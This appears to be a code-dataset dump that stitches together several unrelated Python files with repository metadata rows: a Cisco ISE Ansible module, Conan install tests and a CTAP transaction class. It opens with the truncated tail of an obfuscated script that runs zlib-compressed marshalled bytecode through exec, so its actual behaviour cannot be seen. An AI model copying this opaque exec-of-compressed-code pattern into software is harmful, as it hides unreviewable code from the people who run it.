2k-8\x8bw\xea"1\x8d\x06tt\xdab\xcaE\x0f\x89\xfd\xe3\x0cXB.\x8e\x1as\xe3D\x15\x7f\xf8.\xf67\xdb]8\xcc\x8c5\xec)\xb6\xa1\x98\x0f}N\x15\xb9\xa7\xca\xac\x88\xc0\xd7\xb7\xbbt\x8c\xc3\xe1>\x08\\{\xf0\xd0\x83\x0c\xf3\xcc\xb5\x8f\xbd\xd8&\x932#Kw\xe6/\xad\x16\xea\x86\xfeC\xaaU\xc8-\xf8\xf0\t\xfag\x0b\xba\xfd\xe4\xab\xa0}\x198\xea\xf6x\xc4\x13\xb4Y\x80\xff\x8a\xde\xe2.W;\xf0\x04i\x1bd\x12\t.\xf9\x03\xb3\xc9\xfb\\\x8b\xf4\x88\x0fs\xeeDk\x85\x0f\xd0K\r\xf9\xa14\xf1`\x9e\xcd5\x98\x0fg\x15\xcc~\xc7\xfb\x0cr\x9bY\x1fs\xd1\x879\xd5!\xa0\x1d\xc0"\xc5\x8aQ3]\xb3\x98\xcezd<\xce\xaa\t\xa7\xe9\xab\xae\x01\x0fe\xbf\xce\xa7\x8dX\xc83(\xf4\xc88\xafq\xdcS\xc1\xdf\x87\xb9{]\xc1L\r~$\xb8]\xeb\xda\xc3\x93\xa0\xa6\xfb\x9dyB\xe6\xa0;u\xe83\xef>\xd7i]\x1cn.\xc3\xbd\xf8E<\x1bt\xf8\xaew\xf9\x11[<\x1f{V\xbe\xdd\xadO1\xbb\xa7\x98\x9c\x95L\xcf\x86\xbbt\xe5\x80\x8e\xe7\xb0\x06L\xe7\xc3\xcc\xf6\xe97\x83\xa9\xf6\xb7\xbd\xd2\x17\xf5\x88\xe7\xc3\xb9\xdb`\xa8Kz\x8a)\xffIL\xf9\x8b\x98\xf2SL\xf9)\xa6\xf2\'1\x95/b*O1\x15\x11\xf3\xc1\xe3b\xf0\x1a\xc0\xcb\x90\xe3a&\x9c\xc1o*\xf0\x98\xe5\xe0i\xc0\xd9#\x8e\xfa\xc1\x9f>s\xb9\xa3\x83.\xdec\xa6\xcf1\xab8\x1c\xb9|\xd5\x8b\xaft9\xfc~\xf2\x0b\xecb\x1f\xef\xb0\x01\x9f%\xfc\x8a\xf5Q\x7f\xb02\xe4\xa1\xfa\xd7\xdf\x7f\xff/3\xe1\xea\xcd)\x03\xda\x04zlib\xda\x04exec\xda\ndecompress\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x17AK27HBD\nMohammad Alamin\xda\x08<module>\x01\x00\x00\x00s\x04\x00\x00\x00\x08\x01\x12\x01'))
| 1,429
| 5,643
| 0.737229
|
2204a9a7ef79e24dcad3f62f9ff36759dfefe6d9
| 3,280
|
py
|
Python
|
venv/lib/python3.8/site-packages/ansible_collections/cisco/ise/plugins/modules/sms_provider_info.py
|
saeedya/docker-ansible
|
6fb0cfc6bc4a5925b21380952a5a4502ec02119a
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.8/site-packages/ansible_collections/cisco/ise/plugins/modules/sms_provider_info.py
|
saeedya/docker-ansible
|
6fb0cfc6bc4a5925b21380952a5a4502ec02119a
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.8/site-packages/ansible_collections/cisco/ise/plugins/modules/sms_provider_info.py
|
saeedya/docker-ansible
|
6fb0cfc6bc4a5925b21380952a5a4502ec02119a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2021, Cisco Systems
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
DOCUMENTATION = r"""
---
module: sms_provider_info
short_description: Information module for Sms Provider
description:
- Get all Sms Provider.
version_added: '1.0.0'
extends_documentation_fragment:
- cisco.ise.module_info
author: Rafael Campos (@racampos)
options:
page:
description:
- Page query parameter. Page number.
type: int
size:
description:
- Size query parameter. Number of objects returned per page.
type: int
sortasc:
description:
- Sortasc query parameter. Sort asc.
type: str
sortdsc:
description:
- Sortdsc query parameter. Sort desc.
type: str
filter:
description:
- >
Filter query parameter. <br/> **Simple filtering** should be available through the filter query string
parameter. The structure of a filter is a triplet of field operator and value separated with dots. More than
one filter can be sent. The logical operator common to ALL filter criteria will be by default AND, and can
be changed by using the "filterType=or" query string parameter. Each resource Data model description should
specify if an attribute is a filtered field. <br/> Operator | Description <br/>
------------|----------------- <br/> EQ | Equals <br/> NEQ | Not Equals <br/> GT | Greater Than <br/> LT |
Less Then <br/> STARTSW | Starts With <br/> NSTARTSW | Not Starts With <br/> ENDSW | Ends With <br/> NENDSW
| Not Ends With <br/> CONTAINS | Contains <br/> NCONTAINS | Not Contains <br/>.
type: list
filterType:
description:
- >
FilterType query parameter. The logical operator common to ALL filter criteria will be by default AND, and
can be changed by using the parameter.
type: str
requirements:
- ciscoisesdk >= 1.1.0
- python >= 3.5
seealso:
# Reference by Internet resource
- name: Sms Provider reference
description: Complete reference of the Sms Provider object model.
link: https://ciscoisesdk.readthedocs.io/en/latest/api/api.html#v3-0-0-summary
"""
EXAMPLES = r"""
- name: Get all Sms Provider
cisco.ise.sms_provider_info:
ise_hostname: "{{ise_hostname}}"
ise_username: "{{ise_username}}"
ise_password: "{{ise_password}}"
ise_verify: "{{ise_verify}}"
page: 1
size: 20
sortasc: string
sortdsc: string
filter: []
filterType: AND
register: result
"""
RETURN = r"""
ise_response:
description: A dictionary or list with the response returned by the Cisco ISE Python SDK
returned: always
type: list
elements: dict
sample: >
[
{
"id": "string",
"name": "string",
"link": {
"rel": "string",
"href": "string",
"type": "string"
}
}
]
ise_responses:
description: A dictionary or list with the response returned by the Cisco ISE Python SDK
returned: always
version_added: "1.1.0"
type: list
elements: dict
sample: >
[
{
"id": "string",
"name": "string",
"link": {
"rel": "string",
"href": "string",
"type": "string"
}
}
]
"""
| 28.034188
| 114
| 0.639939
|
33134cd7c8754b1bc8b3552a9fb7d4905bb700db
| 21,736
|
py
|
Python
|
conans/test/integration/command/install/install_test.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | 1
|
2022-01-21T05:31:13.000Z
|
2022-01-21T05:31:13.000Z
|
conans/test/integration/command/install/install_test.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | null | null | null |
conans/test/integration/command/install/install_test.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | null | null | null |
import os
import textwrap
from collections import OrderedDict
import pytest
from conans.model.ref import ConanFileReference
from conans.test.utils.tools import NO_SETTINGS_PACKAGE_ID
from conans.test.utils.tools import TestClient, TestServer, GenConanfile
from conans.util.files import mkdir, rmdir, save
@pytest.fixture()
def client():
c = TestClient(default_server_user=True)
save(c.cache.settings_path, "os: [Windows, Macos, Linux, FreeBSD]\nos_build: [Windows, Macos]")
save(c.cache.default_profile_path, "[settings]\nos=Windows")
return c
def test_not_found_package_dirty_cache(client):
# Conan does a lock on the cache, and even if the package doesn't exist
# left a trailing folder with the filelocks. This test checks
# it will be cleared
client.save({"conanfile.py": GenConanfile("Hello", "0.1")})
client.run("create . lasote/testing")
client.run("upload * --all --confirm")
client.run('remove "*" -f')
client.run(" install hello/0.1@lasote/testing", assert_error=True)
assert "Unable to find 'hello/0.1@lasote/testing'" in client.out
# This used to fail in Windows, because of the trailing lock
client.run("remove * -f")
client.run(" install Hello/0.1@lasote/testing")
def test_install_reference_txt(client):
# Test to check the "conan install <path> <reference>" command argument
client.save({"conanfile.txt": ""})
client.run("info .")
assert "conanfile.txt" in str(client.out).splitlines()
def test_install_reference_error(client):
# Test to check the "conan install <path> <reference>" command argument
client.run("install Pkg/0.1@myuser/testing user/testing", assert_error=True)
assert "ERROR: A full reference was provided as first argument" in client.out
def test_install_reference(client):
# Test to check the "conan install <path> <reference>" command argument
conanfile = textwrap.dedent("""
from conans import ConanFile
class Pkg(ConanFile):
def build(self):
self.output.info("REF: %s, %s, %s, %s"
% (self.name, self.version, self.user, self.channel))
""")
client.save({"conanfile.py": conanfile})
client.run(" install . Pkg/0.1@myuser/testing")
client.run(" info .")
assert "Pkg/0.1@myuser/testing" in client.out
client.run("build .")
assert "REF: Pkg, 0.1, myuser, testing" in client.out
# Trying with partial name
conanfile = conanfile + " name = 'Other'\n"
client.save({"conanfile.py": conanfile})
# passing the wrong package name raises
client.run(" install . Pkg/0.1@myuser/testing", assert_error=True)
assert "ERROR: Package recipe with name Pkg!=Other" in client.out
# Partial reference works
client.run(" install . 0.1@myuser/testing")
client.run("build .")
assert "REF: Other, 0.1, myuser, testing" in client.out
# And also full reference matching
client.run(" install . Other/0.1@myuser/testing")
client.run("build .")
assert "REF: Other, 0.1, myuser, testing" in client.out
# Trying with partial name and version
conanfile = conanfile + " version = '0.2'\n"
client.save({"conanfile.py": conanfile})
# passing the wrong package name raises
client.run(" install . Other/0.1@myuser/testing", assert_error=True)
assert "ERROR: Package recipe with version 0.1!=0.2" in client.out
# Partial reference works
client.run(" install . myuser/testing")
client.run("build .")
assert "REF: Other, 0.2, myuser, testing" in client.out
# And also full reference matching
client.run(" install . Other/0.2@myuser/testing")
client.run("build .")
assert "REF: Other, 0.2, myuser, testing" in client.out
def test_four_subfolder_install(client):
# https://github.com/conan-io/conan/issues/3950
client.save({"path/to/sub/folder/conanfile.txt": ""})
# If this doesn't, fail, all good
client.run(" install path/to/sub/folder")
def test_install_system_requirements(client):
client.save({"conanfile.py": textwrap.dedent("""
from conans import ConanFile
class MyPkg(ConanFile):
def system_requirements(self):
self.output.info("Running system requirements!!")
""")})
client.run(" install .")
assert "Running system requirements!!" in client.out
client.run("export . Pkg/0.1@lasote/testing")
client.run(" install Pkg/0.1@lasote/testing --build")
assert "Running system requirements!!" in client.out
client.run("upload * --all --confirm")
client.run('remove "*" -f')
client.run(" install Pkg/0.1@lasote/testing")
assert "Running system requirements!!" in client.out
def test_install_transitive_pattern(client):
# Make sure a simple conan install doesn't fire package_info() so self.package_folder breaks
client.save({"conanfile.py": textwrap.dedent("""
from conans import ConanFile
class Pkg(ConanFile):
options = {"shared": [True, False, "header"]}
default_options = "shared=False"
def package_info(self):
self.output.info("PKG OPTION: %s" % self.options.shared)
""")})
client.run("create . Pkg/0.1@user/testing -o shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
client.save({"conanfile.py": textwrap.dedent("""
from conans import ConanFile
class Pkg(ConanFile):
requires = "Pkg/0.1@user/testing"
options = {"shared": [True, False, "header"]}
default_options = "shared=False"
def package_info(self):
self.output.info("PKG2 OPTION: %s" % self.options.shared)
""")})
client.run("create . Pkg2/0.1@user/testing -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: True" in client.out
client.run(" install Pkg2/0.1@user/testing -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: True" in client.out
# Priority of non-scoped options
client.run("create . Pkg2/0.1@user/testing -o shared=header -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
client.run(" install Pkg2/0.1@user/testing -o shared=header -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
# Prevalence of exact named option
client.run("create . Pkg2/0.1@user/testing -o *:shared=True -o Pkg2:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
client.run(" install Pkg2/0.1@user/testing -o *:shared=True -o Pkg2:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
# Prevalence of exact named option reverse
client.run("create . Pkg2/0.1@user/testing -o *:shared=True -o Pkg:shared=header "
"--build=missing")
assert "Pkg/0.1@user/testing: Calling build()" in client.out
assert "Pkg/0.1@user/testing: PKG OPTION: header" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: True" in client.out
client.run(" install Pkg2/0.1@user/testing -o *:shared=True -o Pkg:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: header" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: True" in client.out
# Prevalence of alphabetical pattern
client.run("create . Pkg2/0.1@user/testing -o *:shared=True -o Pkg2*:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
client.run(" install Pkg2/0.1@user/testing -o *:shared=True -o Pkg2*:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
# Prevalence of alphabetical pattern, opposite order
client.run("create . Pkg2/0.1@user/testing -o Pkg2*:shared=header -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
client.run(" install Pkg2/0.1@user/testing -o Pkg2*:shared=header -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
# Prevalence and override of alphabetical pattern
client.run("create . Pkg2/0.1@user/testing -o *:shared=True -o Pkg*:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: header" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
client.run(" install Pkg2/0.1@user/testing -o *:shared=True -o Pkg*:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: header" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
def test_install_package_folder(client):
# Make sure a simple conan install doesn't fire package_info() so self.package_folder breaks
client.save({"conanfile.py": textwrap.dedent("""\
from conans import ConanFile
import os
class Pkg(ConanFile):
def package_info(self):
self.dummy_doesnt_exist_not_break
self.output.info("Hello")
self.env_info.PATH = os.path.join(self.package_folder, "bin")
""")})
client.run(" install .")
assert "Hello" not in client.out
assert "conanfile.py: Generated conaninfo.txt" in client.out
def test_install_cwd(client):
client.save({"conanfile.py": GenConanfile("Hello", "0.1").with_setting("os")})
client.run("export . lasote/stable")
client.save({"conanfile.txt": "[requires]\nHello/0.1@lasote/stable"}, clean_first=True)
client.run("install . --build=missing -s os_build=Windows --install-folder=win_dir")
assert "Hello/0.1@lasote/stable from local cache" in client.out
client.run("install . --build=missing -s os=Macos -s os_build=Macos "
"--install-folder=os_dir")
conaninfo = client.load("win_dir/conaninfo.txt")
assert "os=Windows" in conaninfo
assert "os=Macos" not in conaninfo
conaninfo = client.load("os_dir/conaninfo.txt")
assert "os=Windows" not in conaninfo
assert "os=Macos" in conaninfo
def test_install_reference_not_conanbuildinfo(client):
client.save({"conanfile.py": GenConanfile("Hello", "0.1").with_setting("os")})
client.run("create . conan/stable")
client.save({}, clean_first=True)
client.run("install Hello/0.1@conan/stable")
assert not os.path.exists(os.path.join(client.current_folder, "conanbuildinfo.txt"))
def test_install_with_profile(client):
# Test for https://github.com/conan-io/conan/pull/2043
conanfile = textwrap.dedent("""
from conans import ConanFile
class TestConan(ConanFile):
settings = "os"
def requirements(self):
self.output.info("PKGOS=%s" % self.settings.os)
""")
client.save({"conanfile.py": conanfile})
client.run("profile new myprofile")
client.run("profile update settings.os=Linux myprofile")
client.run("install . -pr=myprofile --build")
assert "PKGOS=Linux" in client.out
mkdir(os.path.join(client.current_folder, "myprofile"))
client.run("install . -pr=myprofile")
client.run("profile new myotherprofile")
client.run("profile update settings.os=FreeBSD myotherprofile")
client.run("install . -pr=myotherprofile")
assert "PKGOS=FreeBSD" in client.out
client.save({"myotherprofile": "Some garbage without sense [garbage]"})
client.run("install . -pr=myotherprofile")
assert "PKGOS=FreeBSD" in client.out
client.run("install . -pr=./myotherprofile", assert_error=True)
assert "Error while parsing line 0" in client.out
def test_install_with_path_errors(client):
# Install without path param not allowed
client.run("install", assert_error=True)
assert "ERROR: Exiting with code: 2" in client.out
# Path with wrong conanfile.txt path
client.run("install not_real_dir/conanfile.txt --install-folder subdir", assert_error=True)
assert "Conanfile not found" in client.out
# Path with wrong conanfile.py path
client.run("install not_real_dir/conanfile.py --install-folder build", assert_error=True)
assert "Conanfile not found" in client.out
def test_install_broken_reference(client):
client.save({"conanfile.py": GenConanfile()})
client.run("export . Hello/0.1@lasote/stable")
client.run("remote add_ref Hello/0.1@lasote/stable default")
ref = ConanFileReference.loads("Hello/0.1@lasote/stable")
# Because the folder is removed, the metadata is removed and the
# origin remote is lost
rmdir(os.path.join(client.cache.package_layout(ref).base_folder()))
client.run("install Hello/0.1@lasote/stable", assert_error=True)
assert "ERROR: Unable to find 'Hello/0.1@lasote/stable' in remotes" in client.out
# If it was associated, it has to be desasociated
client.run("remote remove_ref Hello/0.1@lasote/stable")
client.run("install Hello/0.1@lasote/stable", assert_error=True)
assert "ERROR: Unable to find 'Hello/0.1@lasote/stable' in remotes" in client.out
def test_install_argument_order(client):
# https://github.com/conan-io/conan/issues/2520
conanfile_boost = textwrap.dedent("""
from conans import ConanFile
class BoostConan(ConanFile):
name = "boost"
version = "0.1"
options = {"shared": [True, False]}
default_options = "shared=True"
""")
conanfile = GenConanfile().with_require("boost/0.1@conan/stable")
client.save({"conanfile.py": conanfile,
"conanfile_boost.py": conanfile_boost})
client.run("create conanfile_boost.py conan/stable")
client.run("install . -o boost:shared=True --build=missing")
output_0 = "%s" % client.out
client.run("install . -o boost:shared=True --build missing")
output_1 = "%s" % client.out
client.run("install -o boost:shared=True . --build missing")
output_2 = "%s" % client.out
client.run("install -o boost:shared=True --build missing .")
output_3 = "%s" % client.out
assert "ERROR" not in output_3
assert output_0 == output_1
assert output_1 == output_2
assert output_2 == output_3
client.run("install -o boost:shared=True --build boost . --build missing")
output_4 = "%s" % client.out
client.run("install -o boost:shared=True --build missing --build boost .")
output_5 = "%s" % client.out
assert output_4 == output_5
def test_install_anonymous(client):
# https://github.com/conan-io/conan/issues/4871
client.save({"conanfile.py": GenConanfile("Pkg", "0.1")})
client.run("create . lasote/testing")
client.run("upload * --confirm --all")
client2 = TestClient(servers=client.servers, users={})
client2.run("install Pkg/0.1@lasote/testing")
assert "Pkg/0.1@lasote/testing: Package installed" in client2.out
def test_install_without_ref(client):
client.save({"conanfile.py": GenConanfile("lib", "1.0")})
client.run('create .')
assert "lib/1.0: Package '{}' created".format(NO_SETTINGS_PACKAGE_ID) in client.out
client.run('upload lib/1.0 -c --all')
assert "Uploaded conan recipe 'lib/1.0' to 'default'" in client.out
client.run('remove "*" -f')
# This fails, Conan thinks this is a path
client.run('install lib/1.0', assert_error=True)
fake_path = os.path.join(client.current_folder, "lib", "1.0")
assert "Conanfile not found at {}".format(fake_path) in client.out
# Try this syntax to upload too
client.run('install lib/1.0@')
client.run('upload lib/1.0@ -c --all')
def test_install_disabled_remote(client):
client.save({"conanfile.py": GenConanfile()})
client.run("create . Pkg/0.1@lasote/testing")
client.run("upload * --confirm --all -r default")
client.run("remote disable default")
client.run("install Pkg/0.1@lasote/testing -r default")
assert "Pkg/0.1@lasote/testing: Already installed!" in client.out
client.run("remote enable default")
client.run("install Pkg/0.1@lasote/testing -r default")
client.run("remote disable default")
client.run("install Pkg/0.1@lasote/testing --update", assert_error=True)
assert "ERROR: Remote 'default' is disabled" in client.out
def test_install_skip_disabled_remote():
client = TestClient(servers=OrderedDict({"default": TestServer(),
"server2": TestServer(),
"server3": TestServer()}),
users={"default": [("lasote", "mypass")],
"server3": [("lasote", "mypass")]})
client.save({"conanfile.py": GenConanfile()})
client.run("create . Pkg/0.1@lasote/testing")
client.run("upload * --confirm --all -r default")
client.run("upload * --confirm --all -r server3")
client.run("remove * -f")
client.run("remote disable default")
client.run("install Pkg/0.1@lasote/testing", assert_error=False)
assert "Trying with 'default'..." not in client.out
def test_install_without_update_fail(client):
# https://github.com/conan-io/conan/issues/9183
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@")
client.run("upload * --confirm --all -r default")
client.save({"conanfile.py": GenConanfile().with_requires("zlib/1.0")})
client.run("remote disable default")
client.run("install .")
assert "zlib/1.0: Already installed" in client.out
def test_install_version_range_reference(client):
# https://github.com/conan-io/conan/issues/5905
client.save({"conanfile.py": GenConanfile()})
client.run("create . pkg/0.1@user/channel")
client.run("install pkg/[*]@user/channel")
assert "pkg/0.1@user/channel from local cache - Cache" in client.out
client.run("install pkg/[0.*]@user/channel")
assert "pkg/0.1@user/channel from local cache - Cache" in client.out
def test_install_error_never(client):
client.save({"conanfile.py": GenConanfile("Hello0", "0.1")})
client.run("create .")
client.run("install . --build never --build missing", assert_error=True)
assert "ERROR: --build=never not compatible with other options" in client.out
client.run("install conanfile.py --build never --build Hello", assert_error=True)
assert "ERROR: --build=never not compatible with other options" in client.out
client.run("install ./conanfile.py --build never --build outdated", assert_error=True)
assert "ERROR: --build=never not compatible with other options" in client.out
class TestCliOverride:
def test_install_cli_override(self, client):
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@")
client.run("create . zlib/2.0@")
client.save({"conanfile.py": GenConanfile().with_requires("zlib/1.0")})
client.run("install . --require-override=zlib/2.0")
assert "zlib/2.0: Already installed" in client.out
def test_install_cli_override_in_conanfile_txt(self, client):
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@")
client.run("create . zlib/2.0@")
client.save({"conanfile.txt": textwrap.dedent("""\
[requires]
zlib/1.0
""")}, clean_first=True)
client.run("install . --require-override=zlib/2.0")
assert "zlib/2.0: Already installed" in client.out
def test_install_ref_cli_override(self, client):
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@")
client.run("create . zlib/1.1@")
client.save({"conanfile.py": GenConanfile().with_requires("zlib/1.0")})
client.run("create . pkg/1.0@")
client.run("install pkg/1.0@ --require-override=zlib/1.1")
assert "zlib/1.1: Already installed" in client.out
def test_create_cli_override(self, client):
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@")
client.run("create . zlib/2.0@")
client.save({"conanfile.py": GenConanfile().with_requires("zlib/1.0"),
"test_package/conanfile.py": GenConanfile().with_test("pass")})
client.run("create . pkg/0.1@ --require-override=zlib/2.0")
assert "zlib/2.0: Already installed" in client.out
def test_install_bintray_warning():
server = TestServer(complete_urls=True)
from conans.client.graph import proxy
proxy.DEPRECATED_CONAN_CENTER_BINTRAY_URL = server.fake_url # Mocking!
client = TestClient(servers={"conan-center": server},
users={"conan-center": [("lasote", "mypass")]})
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@lasote/testing")
client.run("upload zlib/1.0@lasote/testing --all -r conan-center")
client.run("remove * -f")
client.run("install zlib/1.0@lasote/testing -r conan-center")
assert "WARN: Remote https://conan.bintray.com is deprecated and will be shut down " \
"soon" in client.out
client.run("install zlib/1.0@lasote/testing -r conan-center -s build_type=Debug")
assert "WARN: Remote https://conan.bintray.com is deprecated and will be shut down " \
"soon" not in client.out
| 45.377871
| 99
| 0.669534
|
4478053d9fa18eac052c9f007347a297829618bc
| 7,668
|
py
|
Python
|
src/ctap/transaction.py
|
Castellate/VirtualWebAuthn
|
df0f1ee30664b1ee5116fb4277d0bc663be1b914
|
[
"BSD-2-Clause"
] | 3
|
2021-08-18T09:54:49.000Z
|
2022-03-22T20:55:43.000Z
|
src/ctap/transaction.py
|
Castellate/VirtualWebAuthn
|
df0f1ee30664b1ee5116fb4277d0bc663be1b914
|
[
"BSD-2-Clause"
] | 1
|
2021-09-03T10:13:01.000Z
|
2021-09-03T10:13:01.000Z
|
src/ctap/transaction.py
|
Castellate/VirtualWebAuthn
|
df0f1ee30664b1ee5116fb4277d0bc663be1b914
|
[
"BSD-2-Clause"
] | 2
|
2021-12-22T19:10:21.000Z
|
2022-03-14T11:30:31.000Z
|
"""Contains classes and Enums for managing transactions
"""
"""
© Copyright 2020-2021 University of Surrey
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
from enum import Enum, unique
import logging
import json
import ctap.constants
from ctap.exceptions import TransactionStateException, TransactionChannelIDException
from ctap.messages import (CTAPHIDCMD, CTAPHIDCancelResponse, CTAPHIDErrorResponse,
CTAPHIDKeepAliveResponse)
log = logging.getLogger('debug')
ctaplog = logging.getLogger('debug.ctap')
@unique
class TRANSACTION_STATE(Enum):
"""Enum that holds the transaction state
"""
EMPTY = 0
REQUEST_RECV = 1
RESPONSE_SET = 2
KEEP_ALIVE=7
CANCEL = 8
ERROR = 9
class CTAPHIDTransaction:
"""Transaction class the enforces and hold the request-response
messages associated with a CTAP transaction
"""
def __init__(self, channel_id:bytes):
"""Instantiates a new instance associated with the specified channel
Args:
channel_id (bytes): channel id bytes
"""
self.request = None
self.response = None
self.state = TRANSACTION_STATE.EMPTY
self.channel_id = channel_id
def get_cid(self)->bytes:
"""Gets the channel id associated with this transaction
Returns:
bytes: channel id bytes
"""
return self.channel_id
def is_error_transaction(self)->bool:
"""Checks whether this is a special error transaction
that may not have a corresponding request
Returns:
bool: True if it is an error transaciton, False if not
"""
return self.state == TRANSACTION_STATE.ERROR
def is_keep_alive_transaction(self)->bool:
"""Checks whether this is a special keep-alive transaction
that may not have a corresponding request
Returns:
bool: True if it is a keep-alive transaciton, False if not
"""
return self.state == TRANSACTION_STATE.KEEP_ALIVE
def __str__(self):
out = {}
if self.request is None:
out["request"]=None
else:
out["request"]=json.loads(self.request.__str__())
if self.response is None:
out["response"]=None
else:
out["response"]= json.loads(self.response.__str__())
out["state"]=self.state.name
out["channel_id"] = self.channel_id.hex()
return json.dumps(out)
def set_request(self, request: CTAPHIDCMD):
"""Sets the request part of this transaction
Args:
request (CTAPHIDCMD): request to be set
Raises:
TransactionStateException: thrown if transaction is in an
invalid state to receive a request
TransactionChannelIDException: thrown if the request does not
match the transaction channel id
"""
if not self.verify_state(TRANSACTION_STATE.REQUEST_RECV):
ctaplog.error("Invalid state in transaction to set request, current state: %s",
self.state )
raise TransactionStateException("Invalid state, cannot set request")
if (request.get_cid() != ctap.constants.BROADCAST_ID and
request.get_cid() != self.channel_id):
raise TransactionChannelIDException("Invalid channel ID for transaction")
self.state = TRANSACTION_STATE.REQUEST_RECV
self.request = request
ctaplog.debug("Set request, changed state: %s", self.state )
def set_response(self, response: CTAPHIDCMD):
"""Sets the response part of the transaction
Args:
response (CTAPHIDCMD): response to set
Raises:
TransactionStateException: thrown if transaction is in an
invalid state to receive a response
TransactionChannelIDException: thrown if the response does not
match the transaction channel id
"""
if not self.verify_state(TRANSACTION_STATE.RESPONSE_SET):
ctaplog.error("Invalid state in transaction to set response, current state: %s",
self.state )
raise TransactionStateException("Invalid state, cannot set response")
if (response.get_cid() != ctap.constants.BROADCAST_ID and
response.get_cid() != self.channel_id):
raise TransactionChannelIDException("Invalid channel ID for transaction")
self.state = TRANSACTION_STATE.RESPONSE_SET
self.response = response
ctaplog.debug("Set response, changed state: %s", self.state )
def reset(self):
"""Resets the transaction clearling request, response and state
"""
self.request = None
self.response = None
self.state = TRANSACTION_STATE.EMPTY
def cancel(self, response: CTAPHIDCancelResponse):
"""Cancels the request by setting the state to cancel and
setting the response to cancel
Args:
response (CTAPHIDCancelResponse): cancel response to send
"""
self.reset()
self.state = TRANSACTION_STATE.CANCEL
self.response = response
def error(self, response: CTAPHIDErrorResponse):
"""Sets the transaction to an error state and sets an error
response to be sent
Args:
response (CTAPHIDErrorResponse): error response to send
"""
self.state = TRANSACTION_STATE.ERROR
self.response = response
def keep_alive(self,response: CTAPHIDKeepAliveResponse):
"""Sets the transaction to a keep-alive state and sets the
keep-alive response to be sent.
Args:
response (CTAPHIDKeepAliveResponse): keep-alive response to send
"""
self.state = TRANSACTION_STATE.KEEP_ALIVE
self.response = response
def verify_state(self, target_state: TRANSACTION_STATE):
"""Verifies the state machine of the CTAP HID Transaction.
If a request has been received it must be followed by a response being
sent before the next request can be received.
Parameters
----------
target_state : TRANSACTION_STATE
Enum of target transaction state
Returns
-------
bool
True if valid, False if not
"""
return (target_state.value == (self.state.value + 1) and
target_state.value <= TRANSACTION_STATE.RESPONSE_SET.value)
| 36.688995
| 92
| 0.670188
|
f7f7778c7ed11670ebf154abc1c2b4ab8604eef1
| 140
|
py
|
Python
|
tests/test_curlies_in_attrs_2.py
|
